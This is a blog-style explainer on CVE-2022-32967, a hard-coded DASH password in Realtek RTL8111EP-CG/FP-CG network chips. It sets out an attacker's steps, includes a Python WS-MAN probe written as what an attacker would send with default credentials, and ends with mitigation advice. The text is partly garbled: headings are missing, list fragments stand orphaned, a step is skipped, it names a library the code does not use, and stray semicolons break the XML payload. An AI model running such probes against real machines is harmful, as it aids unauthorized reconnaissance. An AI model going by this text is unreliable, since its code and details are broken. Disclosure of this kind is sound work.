CVE-2022-32967 - Inside the RTL8111EP-CG/RTL8111FP-CG DASH Hard-Coded Password Vulnerability

In today’s post, we’re diving deep into CVE-2022-32967, a security vulnerability that might seem small on the surface, but has real implications for the privacy and safety of systems using Realtek RTL8111EP-CG or RTL8111FP-CG network chips. If you use servers that leverage these chips and their DASH (Desktop and mobile Architecture for System Hardware) management features, this is a must-read.

Let’s break down what happened, how it happens, look at code snippets related to the issue, and what you can do to protect your systems.

Realtek RTL8111FP-CG

Both chips support a remote management feature called DASH (Desktop and mobile Architecture for System Hardware). The problem? They ship with a hard-coded, non-changeable default password for certain management functions. This password allows anyone with physical access to the machine, at a specific moment (during reboot), to log in and collect sensitive hardware details — without authentication!

Server model number

Why is this bad? Even though you can’t take over the whole system from here, exfiltrating serial numbers and other identifiers is the first step in more complex attacks or social engineering scams.

How an Attack Would Play Out

1. Insider or person with physical access waits until a legitimate user reboots or power-cycles the server.

Attacker connects to the Ethernet port on the machine.

3. Using a tool that speaks DASH protocol (for example, wsman), attacker enters the hard-coded password (known from documentation or reverse engineering – it’s the same for all shipped devices).

Example Code Snippet

Here’s how an attacker could use Python and the python-pysmb library (or a standard network tool) to access info by sending a DASH/WSMAN request with the default credentials:

import requests
from requests.auth import HTTPBasicAuth

# Replace with the target machine's IP address
dash_ip = '192.168.1.100'

# Hard-coded default credentials (example)
username = 'admin'
password = 'realtek' # This is a placeholder -- see original device documentation

# DASH runs over WS-MAN (usually port 623)
url = f'http://{dash_ip}:623/wsman';

headers = {
    'Content-Type': 'application/soap+xml;charset=UTF-8'
}

# Simple probe to get system info
body = '''
<env:Envelope xmlns:env="http://www.w3.org/2003/05/soap-envelope";
    xmlns:wsm="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd">;
  <env:Header/>
  <env:Body>
    <wsm:Identify/>
  </env:Body>
</env:Envelope>
'''

response = requests.post(url, data=body, headers=headers, auth=HTTPBasicAuth(username, password))
print(response.text)

If the device hasn’t been patched or configured with proper authentication, the attacker will receive info including serial number and manufacturer in the SOAP response.

Motherboard or server model numbers

- Vendor/manufacturer name

Who Is Vulnerable?

- Machines using RTL8111EP-CG or RTL8111FP-CG with DASH, typically servers or some business PCs.

Devices where the DASH management interface is *enabled* (often by default).

- Mainly relevant for on-premises attackers (but can be an issue in data centers or shared server rooms).

Apply Firmware Updates

Realtek and affected vendors usually release firmware updates to lock down or randomize the DASH password. Check your hardware vendor’s support portal.

Disable DASH If Not Needed

If you aren’t using DASH for fleet management, turn it off in the BIOS/UEFI or via jumpers where possible.

Restrict Physical Access

Locked server rooms and clear access protocols go a long way – but remember, even someone with just five minutes alone with a machine during reboot can exploit this.

Network Segmentation

Don’t allow normal users on the same LAN/VLAN as your server management interfaces.

References and Further Reading

- Realtek - CVE-2022-32967 Advisory (NVD)
- Equipment vendor advisory example (Fujitsu)
- Original Realtek documentation
- Overview of WS-MAN/DASH
- DASH protocol basics (Wikipedia)

Final Thoughts

CVE-2022-32967 might look like a “low-risk” flaw – but any time sensitive information is up for grabs, you’re one step closer to a larger security breach. As always: patch your firmware, audit your physical ports, and keep an eye on features you don’t use. Even lesser-known chips like those from Realtek can become the weak point in your chain.

Stay safe, and share this with your data center and IT colleagues!

Timeline

Published on: 11/29/2022 04:15:00 UTC